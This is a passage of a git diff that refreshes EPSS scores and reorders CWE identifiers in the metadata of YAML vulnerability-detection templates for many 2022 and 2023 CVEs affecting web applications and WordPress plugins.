cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43170.yaml b/http/cves/2022/CVE-2022-43170.yaml index c2b436c921..a231e15341 100644 --- a/http/cves/2022/CVE-2022-43170.yaml +++ b/http/cves/2022/CVE-2022-43170.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-43170 cwe-id: CWE-79 epss-score: 0.21471 - epss-percentile: 0.95888 + epss-percentile: 0.9589 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43185.yaml b/http/cves/2022/CVE-2022-43185.yaml index af62e4e8eb..a6f5f6270d 100644 --- a/http/cves/2022/CVE-2022-43185.yaml +++ b/http/cves/2022/CVE-2022-43185.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-43185 cwe-id: CWE-79 epss-score: 0.28071 - epss-percentile: 0.96299 + epss-percentile: 0.96302 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4320.yaml b/http/cves/2022/CVE-2022-4320.yaml index b26484392f..605d3bf888 100644 --- a/http/cves/2022/CVE-2022-4320.yaml +++ b/http/cves/2022/CVE-2022-4320.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-4320 cwe-id: CWE-79 epss-score: 0.00083 - epss-percentile: 0.34679 + epss-percentile: 0.34689 cpe: cpe:2.3:a:mhsoftware:wordpress_events_calendar_plugin:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4321.yaml b/http/cves/2022/CVE-2022-4321.yaml index c8ab3a95cb..86e0d503e8 100644 --- a/http/cves/2022/CVE-2022-4321.yaml +++ b/http/cves/2022/CVE-2022-4321.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-4321 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29488 + epss-percentile: 0.29493 cpe: cpe:2.3:a:wpswings:pdf_generator_for_wordpress:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4325.yaml b/http/cves/2022/CVE-2022-4325.yaml index 14eb1ea242..f6aecf17db 100644 --- a/http/cves/2022/CVE-2022-4325.yaml +++ b/http/cves/2022/CVE-2022-4325.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-4325 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29488 + epss-percentile: 0.29493 cpe: cpe:2.3:a:ifeelweb:post_status_notifier_lite:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4328.yaml b/http/cves/2022/CVE-2022-4328.yaml index 5713453272..4b4f8886da 100644 --- a/http/cves/2022/CVE-2022-4328.yaml +++ b/http/cves/2022/CVE-2022-4328.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-4328 cwe-id: CWE-434 epss-score: 0.88386 - epss-percentile: 0.98347 + epss-percentile: 0.98348 cpe: cpe:2.3:a:najeebmedia:woocommerce_checkout_field_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43769.yaml b/http/cves/2022/CVE-2022-43769.yaml index 05135e54a6..1d3562b904 100644 --- a/http/cves/2022/CVE-2022-43769.yaml +++ b/http/cves/2022/CVE-2022-43769.yaml @@ -15,9 +15,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2022-43769 - cwe-id: CWE-94,CWE-74 + cwe-id: CWE-74,CWE-94 epss-score: 0.27754 - epss-percentile: 0.96274 + epss-percentile: 0.96278 cpe: cpe:2.3:a:hitachi:vantara_pentaho_business_analytics_server:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44290.yaml b/http/cves/2022/CVE-2022-44290.yaml index 8d06fb6094..00cc33f3cf 100644 --- a/http/cves/2022/CVE-2022-44290.yaml +++ b/http/cves/2022/CVE-2022-44290.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-44290 cwe-id: CWE-89 - epss-score: 0.00707 - epss-percentile: 0.78224 + epss-score: 0.00789 + epss-percentile: 0.79616 cpe: cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44291.yaml b/http/cves/2022/CVE-2022-44291.yaml index 1d284233ff..87a50b672d 100644 --- a/http/cves/2022/CVE-2022-44291.yaml +++ b/http/cves/2022/CVE-2022-44291.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-44291 cwe-id: CWE-89 - epss-score: 0.00707 - epss-percentile: 0.78224 + epss-score: 0.00789 + epss-percentile: 0.79616 cpe: cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4447.yaml b/http/cves/2022/CVE-2022-4447.yaml index d62195724b..bbb61f23a4 100644 --- a/http/cves/2022/CVE-2022-4447.yaml +++ b/http/cves/2022/CVE-2022-4447.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-4447 cwe-id: CWE-89 epss-score: 0.02366 - epss-percentile: 0.88638 + epss-percentile: 0.88644 cpe: cpe:2.3:a:fontsy_project:fontsy:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44944.yaml b/http/cves/2022/CVE-2022-44944.yaml index 2c0a186d18..50c43d1e08 100644 --- a/http/cves/2022/CVE-2022-44944.yaml +++ b/http/cves/2022/CVE-2022-44944.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44944 cwe-id: CWE-79 - epss-score: 0.00168 - epss-percentile: 0.53448 + epss-score: 0.00186 + epss-percentile: 0.55769 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44946.yaml b/http/cves/2022/CVE-2022-44946.yaml index 3918e122fe..b5badb03b4 100644 --- a/http/cves/2022/CVE-2022-44946.yaml +++ b/http/cves/2022/CVE-2022-44946.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44946 cwe-id: CWE-79 - epss-score: 0.00168 - epss-percentile: 0.53448 + epss-score: 0.00186 + epss-percentile: 0.55769 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44947.yaml b/http/cves/2022/CVE-2022-44947.yaml index b3fd951c72..bec32fdddf 100644 --- a/http/cves/2022/CVE-2022-44947.yaml +++ b/http/cves/2022/CVE-2022-44947.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44947 cwe-id: CWE-79 - epss-score: 0.002 - epss-percentile: 0.57642 + epss-score: 0.00221 + epss-percentile: 0.60147 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44948.yaml b/http/cves/2022/CVE-2022-44948.yaml index 8e94647f08..66f0191b53 100644 --- a/http/cves/2022/CVE-2022-44948.yaml +++ b/http/cves/2022/CVE-2022-44948.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44948 cwe-id: CWE-79 - epss-score: 0.00168 - epss-percentile: 0.53448 + epss-score: 0.00186 + epss-percentile: 0.55769 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44949.yaml b/http/cves/2022/CVE-2022-44949.yaml index 20a9eb4bd7..c276e4d962 100644 --- a/http/cves/2022/CVE-2022-44949.yaml +++ b/http/cves/2022/CVE-2022-44949.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44949 cwe-id: CWE-79 - epss-score: 0.00168 - epss-percentile: 0.53448 + epss-score: 0.00186 + epss-percentile: 0.55769 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44950.yaml b/http/cves/2022/CVE-2022-44950.yaml index 074afdc6cb..22ee322492 100644 --- a/http/cves/2022/CVE-2022-44950.yaml +++ b/http/cves/2022/CVE-2022-44950.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44950 cwe-id: CWE-79 - epss-score: 0.00168 - epss-percentile: 0.53448 + epss-score: 0.00186 + epss-percentile: 0.55769 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44951.yaml b/http/cves/2022/CVE-2022-44951.yaml index d1286ed449..b47bd7f7f2 100644 --- a/http/cves/2022/CVE-2022-44951.yaml +++ b/http/cves/2022/CVE-2022-44951.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44951 cwe-id: CWE-79 - epss-score: 0.00168 - epss-percentile: 0.53448 + epss-score: 0.00186 + epss-percentile: 0.55769 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44952.yaml b/http/cves/2022/CVE-2022-44952.yaml index 2827ff1501..ac90a62a1c 100644 --- a/http/cves/2022/CVE-2022-44952.yaml +++ b/http/cves/2022/CVE-2022-44952.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44952 cwe-id: CWE-79 - epss-score: 0.12436 - epss-percentile: 0.94814 + epss-score: 0.13545 + epss-percentile: 0.94989 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44957.yaml b/http/cves/2022/CVE-2022-44957.yaml index 55d028843f..4e7f411cbc 100644 --- a/http/cves/2022/CVE-2022-44957.yaml +++ b/http/cves/2022/CVE-2022-44957.yaml @@ -16,8 +16,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44957 cwe-id: CWE-79 - epss-score: 0.00168 - epss-percentile: 0.53448 + epss-score: 0.00186 + epss-percentile: 0.55769 cpe: cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-45037.yaml b/http/cves/2022/CVE-2022-45037.yaml index 7c9a1be85b..82fa3eeffc 100644 --- a/http/cves/2022/CVE-2022-45037.yaml +++ b/http/cves/2022/CVE-2022-45037.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-45037 cwe-id: CWE-79 epss-score: 0.00086 - epss-percentile: 0.35833 + epss-percentile: 0.35845 cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-45038.yaml b/http/cves/2022/CVE-2022-45038.yaml index 380cadd2c4..6b8f9d0fe5 100644 --- a/http/cves/2022/CVE-2022-45038.yaml +++ b/http/cves/2022/CVE-2022-45038.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-45038 cwe-id: CWE-79 epss-score: 0.00086 - epss-percentile: 0.35833 + epss-percentile: 0.35845 cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-45917.yaml b/http/cves/2022/CVE-2022-45917.yaml index 3616e557f6..f0441fc522 100644 --- a/http/cves/2022/CVE-2022-45917.yaml +++ b/http/cves/2022/CVE-2022-45917.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-45917 cwe-id: CWE-601 epss-score: 0.00088 - epss-percentile: 0.36896 + epss-percentile: 0.36908 cpe: cpe:2.3:a:ilias:ilias:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-45933.yaml b/http/cves/2022/CVE-2022-45933.yaml index 2e6bac70b2..2c589b0ece 100644 --- a/http/cves/2022/CVE-2022-45933.yaml +++ b/http/cves/2022/CVE-2022-45933.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-45933 cwe-id: CWE-306 epss-score: 0.00753 - epss-percentile: 0.78966 + epss-percentile: 0.78978 cpe: cpe:2.3:a:kubeview_project:kubeview:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46020.yaml b/http/cves/2022/CVE-2022-46020.yaml index 0d9e87a3d6..45e5f88860 100644 --- a/http/cves/2022/CVE-2022-46020.yaml +++ b/http/cves/2022/CVE-2022-46020.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-46020 cwe-id: CWE-434 epss-score: 0.01722 - epss-percentile: 0.86444 + epss-percentile: 0.86447 cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46071.yaml b/http/cves/2022/CVE-2022-46071.yaml index 5394aee7e1..1a205998a2 100644 --- a/http/cves/2022/CVE-2022-46071.yaml +++ b/http/cves/2022/CVE-2022-46071.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-46071 cwe-id: CWE-89 epss-score: 0.01462 - epss-percentile: 0.85278 + epss-percentile: 0.85287 cpe: cpe:2.3:a:helmet_store_showroom_site_project:helmet_store_showroom_site:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46073.yaml b/http/cves/2022/CVE-2022-46073.yaml index 930ba39fe7..a192286896 100644 --- a/http/cves/2022/CVE-2022-46073.yaml +++ b/http/cves/2022/CVE-2022-46073.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-46073 cwe-id: CWE-79 epss-score: 0.00066 - epss-percentile: 0.27786 + epss-percentile: 0.27789 cpe: cpe:2.3:a:helmet_store_showroom_project:helmet_store_showroom:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46169.yaml b/http/cves/2022/CVE-2022-46169.yaml index 22ccd7ac46..ac1be1b705 100644 --- a/http/cves/2022/CVE-2022-46169.yaml +++ b/http/cves/2022/CVE-2022-46169.yaml @@ -18,7 +18,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-46169 - cwe-id: CWE-74,CWE-78 + cwe-id: CWE-78,CWE-74 epss-score: 0.96741 epss-percentile: 0.99543 cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:* @@ -63,4 +63,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022039c93cb298789192eae7121274c911c4d978370ea8d531aeeff2643a0bdec197022065d145f00a1bd7c2bde0bdfa395f7d17018515d4cd1fe36f3425151945edd3c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022039c93cb298789192eae7121274c911c4d978370ea8d531aeeff2643a0bdec197022065d145f00a1bd7c2bde0bdfa395f7d17018515d4cd1fe36f3425151945edd3c3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2022/CVE-2022-46381.yaml b/http/cves/2022/CVE-2022-46381.yaml index 0138765e83..83a4b8760f 100644 --- a/http/cves/2022/CVE-2022-46381.yaml +++ b/http/cves/2022/CVE-2022-46381.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-46381 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.2948 + epss-percentile: 0.29485 cpe: cpe:2.3:o:niceforyou:linear_emerge_e3_access_control_firmware:0.32-07e:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46443.yaml b/http/cves/2022/CVE-2022-46443.yaml index c0cff11ac3..f5a9d8da63 100644 --- a/http/cves/2022/CVE-2022-46443.yaml +++ b/http/cves/2022/CVE-2022-46443.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-46443 cwe-id: CWE-89 epss-score: 0.04555 - epss-percentile: 0.9157 + epss-percentile: 0.91581 cpe: cpe:2.3:a:bangresto_project:bangresto:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46463.yaml b/http/cves/2022/CVE-2022-46463.yaml index 7e7fb8fd35..ed8db66da7 100644 --- a/http/cves/2022/CVE-2022-46463.yaml +++ b/http/cves/2022/CVE-2022-46463.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-46463 cwe-id: CWE-306 epss-score: 0.02361 - epss-percentile: 0.88626 + epss-percentile: 0.88631 cpe: cpe:2.3:a:linuxfoundation:harbor:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46888.yaml b/http/cves/2022/CVE-2022-46888.yaml index 799ca8231a..3696bcf050 100644 --- a/http/cves/2022/CVE-2022-46888.yaml +++ b/http/cves/2022/CVE-2022-46888.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-46888 cwe-id: CWE-79 epss-score: 0.00089 - epss-percentile: 0.37718 + epss-percentile: 0.37731 cpe: cpe:2.3:a:nexusphp:nexusphp:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46934.yaml b/http/cves/2022/CVE-2022-46934.yaml index 6306b454ab..b2fe010b95 100644 --- a/http/cves/2022/CVE-2022-46934.yaml +++ b/http/cves/2022/CVE-2022-46934.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-46934 cwe-id: CWE-79 epss-score: 0.00085 - epss-percentile: 0.35419 + epss-percentile: 0.35431 cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-47002.yaml b/http/cves/2022/CVE-2022-47002.yaml index dc18a74f56..b4a665bdae 100644 --- a/http/cves/2022/CVE-2022-47002.yaml +++ b/http/cves/2022/CVE-2022-47002.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-47002 cwe-id: CWE-863 epss-score: 0.01681 - epss-percentile: 0.86289 + epss-percentile: 0.86294 cpe: cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-47003.yaml b/http/cves/2022/CVE-2022-47003.yaml index 1a4d88b8e0..861355bc49 100644 --- a/http/cves/2022/CVE-2022-47003.yaml +++ b/http/cves/2022/CVE-2022-47003.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-47003 cwe-id: CWE-863 epss-score: 0.01698 - epss-percentile: 0.8635 + epss-percentile: 0.86354 cpe: cpe:2.3:a:murasoftware:mura_cms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-47075.yaml b/http/cves/2022/CVE-2022-47075.yaml index 0eebdaf613..2944a289d6 100644 --- a/http/cves/2022/CVE-2022-47075.yaml +++ b/http/cves/2022/CVE-2022-47075.yaml @@ -17,7 +17,7 @@ info: cvss-score: 7.5 cve-id: CVE-2022-47075 epss-score: 0.00409 - epss-percentile: 0.70989 + epss-percentile: 0.71013 cpe: cpe:2.3:a:smartofficepayroll:smartoffice:*:*:*:*:web:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-47615.yaml b/http/cves/2022/CVE-2022-47615.yaml index fe0d102649..96af5a57b0 100644 --- a/http/cves/2022/CVE-2022-47615.yaml +++ b/http/cves/2022/CVE-2022-47615.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-47615 cwe-id: CWE-434 epss-score: 0.00729 - epss-percentile: 0.78638 + epss-percentile: 0.78649 cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-47945.yaml b/http/cves/2022/CVE-2022-47945.yaml index 3f19e807c5..19c833be34 100644 --- a/http/cves/2022/CVE-2022-47945.yaml +++ b/http/cves/2022/CVE-2022-47945.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-47945 cwe-id: CWE-22 epss-score: 0.04956 - epss-percentile: 0.91916 + epss-percentile: 0.91928 cpe: cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-47966.yaml b/http/cves/2022/CVE-2022-47966.yaml index 0f2913b0a6..250eba9599 100644 --- a/http/cves/2022/CVE-2022-47966.yaml +++ b/http/cves/2022/CVE-2022-47966.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-47966 - epss-score: 0.97053 - epss-percentile: 0.99676 + epss-score: 0.97051 + epss-percentile: 0.99674 cpe: cpe:2.3:a:zohocorp:manageengine_access_manager_plus:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-47986.yaml b/http/cves/2022/CVE-2022-47986.yaml index ee9879de9b..a9182399c4 100644 --- a/http/cves/2022/CVE-2022-47986.yaml +++ b/http/cves/2022/CVE-2022-47986.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-47986 cwe-id: CWE-502 epss-score: 0.89374 - epss-percentile: 0.98407 + epss-percentile: 0.98409 cpe: cpe:2.3:a:ibm:aspera_faspex:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-48012.yaml b/http/cves/2022/CVE-2022-48012.yaml index bf646bb521..3d327f6098 100644 --- a/http/cves/2022/CVE-2022-48012.yaml +++ b/http/cves/2022/CVE-2022-48012.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-48012 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29452 + epss-percentile: 0.29456 cpe: cpe:2.3:a:opencats:opencats:0.9.7:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-48165.yaml b/http/cves/2022/CVE-2022-48165.yaml index 5e782bee6b..7a207848f5 100644 --- a/http/cves/2022/CVE-2022-48165.yaml +++ b/http/cves/2022/CVE-2022-48165.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-48165 cwe-id: CWE-284 epss-score: 0.02948 - epss-percentile: 0.89731 + epss-percentile: 0.89737 cpe: cpe:2.3:o:wavlink:wl-wn530h4_firmware:m30h4.v5030.210121:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-48197.yaml b/http/cves/2022/CVE-2022-48197.yaml index d57777f40a..1128cbb293 100644 --- a/http/cves/2022/CVE-2022-48197.yaml +++ b/http/cves/2022/CVE-2022-48197.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-48197 cwe-id: CWE-79 epss-score: 0.00139 - epss-percentile: 0.49191 + epss-percentile: 0.4921 cpe: cpe:2.3:a:yui_project:yui:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4897.yaml b/http/cves/2022/CVE-2022-4897.yaml index 595f2bfe3c..9f476c0c52 100644 --- a/http/cves/2022/CVE-2022-4897.yaml +++ b/http/cves/2022/CVE-2022-4897.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-4897 cwe-id: CWE-79 epss-score: 0.00289 - epss-percentile: 0.65468 + epss-percentile: 0.65504 cpe: cpe:2.3:a:ithemes:backupbuddy:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0099.yaml b/http/cves/2023/CVE-2023-0099.yaml index b35e4b3634..f57a3dbf57 100644 --- a/http/cves/2023/CVE-2023-0099.yaml +++ b/http/cves/2023/CVE-2023-0099.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-0099 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29488 + epss-percentile: 0.29493 cpe: cpe:2.3:a:getlasso:simple_urls:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0126.yaml b/http/cves/2023/CVE-2023-0126.yaml index ef81f4120c..15e978d6f0 100644 --- a/http/cves/2023/CVE-2023-0126.yaml +++ b/http/cves/2023/CVE-2023-0126.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-0126 cwe-id: CWE-22 epss-score: 0.05528 - epss-percentile: 0.92392 + epss-percentile: 0.924 cpe: cpe:2.3:o:sonicwall:sma1000_firmware:12.4.2:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-0236.yaml b/http/cves/2023/CVE-2023-0236.yaml index 08e2076411..356ab76126 100644 --- a/http/cves/2023/CVE-2023-0236.yaml +++ b/http/cves/2023/CVE-2023-0236.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-0236 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29488 + epss-percentile: 0.29493 cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0261.yaml b/http/cves/2023/CVE-2023-0261.yaml index d8c1294668..5abacc718a 100644 --- a/http/cves/2023/CVE-2023-0261.yaml +++ b/http/cves/2023/CVE-2023-0261.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-0261 cwe-id: CWE-89 epss-score: 0.07286 - epss-percentile: 0.93318 + epss-percentile: 0.93324 cpe: cpe:2.3:a:ljapps:wp_tripadvisor_review_slider:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0334.yaml b/http/cves/2023/CVE-2023-0334.yaml index 3722ba10a8..1232d2fcae 100644 --- a/http/cves/2023/CVE-2023-0334.yaml +++ b/http/cves/2023/CVE-2023-0334.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-0334 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29488 + epss-percentile: 0.29493 cpe: cpe:2.3:a:shortpixel:shortpixel_adaptive_images:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0448.yaml b/http/cves/2023/CVE-2023-0448.yaml index 693f0e3163..4d6b260bbc 100644 --- a/http/cves/2023/CVE-2023-0448.yaml +++ b/http/cves/2023/CVE-2023-0448.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-0448 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29488 + epss-percentile: 0.29493 cpe: cpe:2.3:a:matbao:wp_helper_premium:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0514.yaml b/http/cves/2023/CVE-2023-0514.yaml index bd91b4c0d4..9a70843669 100644 --- a/http/cves/2023/CVE-2023-0514.yaml +++ b/http/cves/2023/CVE-2023-0514.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-0514 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29569 + epss-percentile: 0.29573 cpe: cpe:2.3:a:membership_database_project:membership_database:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0527.yaml b/http/cves/2023/CVE-2023-0527.yaml index 209094b195..8e4b0d1f80 100644 --- a/http/cves/2023/CVE-2023-0527.yaml +++ b/http/cves/2023/CVE-2023-0527.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-0527 cwe-id: CWE-79 epss-score: 0.0025 - epss-percentile: 0.62698 + epss-percentile: 0.62725 cpe: cpe:2.3:a:online_security_guards_hiring_system_project:online_security_guards_hiring_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0552.yaml b/http/cves/2023/CVE-2023-0552.yaml index d015451852..3e82d588b3 100644 --- a/http/cves/2023/CVE-2023-0552.yaml +++ b/http/cves/2023/CVE-2023-0552.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-0552 cwe-id: CWE-601 epss-score: 0.00077 - epss-percentile: 0.323 + epss-percentile: 0.32308 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0562.yaml b/http/cves/2023/CVE-2023-0562.yaml index 8e95850a9a..a3bc1924dd 100644 --- a/http/cves/2023/CVE-2023-0562.yaml +++ b/http/cves/2023/CVE-2023-0562.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-0562 cwe-id: CWE-89 epss-score: 0.01999 - epss-percentile: 0.87592 + epss-percentile: 0.87598 cpe: cpe:2.3:a:bank_locker_management_system_project:bank_locker_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0563.yaml b/http/cves/2023/CVE-2023-0563.yaml index c4b566c346..d70620b454 100644 --- a/http/cves/2023/CVE-2023-0563.yaml +++ b/http/cves/2023/CVE-2023-0563.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-0563 cwe-id: CWE-79 epss-score: 0.00563 - epss-percentile: 0.75184 + epss-percentile: 0.75207 cpe: cpe:2.3:a:bank_locker_management_system_project:bank_locker_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0600.yaml b/http/cves/2023/CVE-2023-0600.yaml index b0661b38c4..92f533d5a5 100644 --- a/http/cves/2023/CVE-2023-0600.yaml +++ b/http/cves/2023/CVE-2023-0600.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-0600 cwe-id: CWE-89 epss-score: 0.02028 - epss-percentile: 0.87686 + epss-percentile: 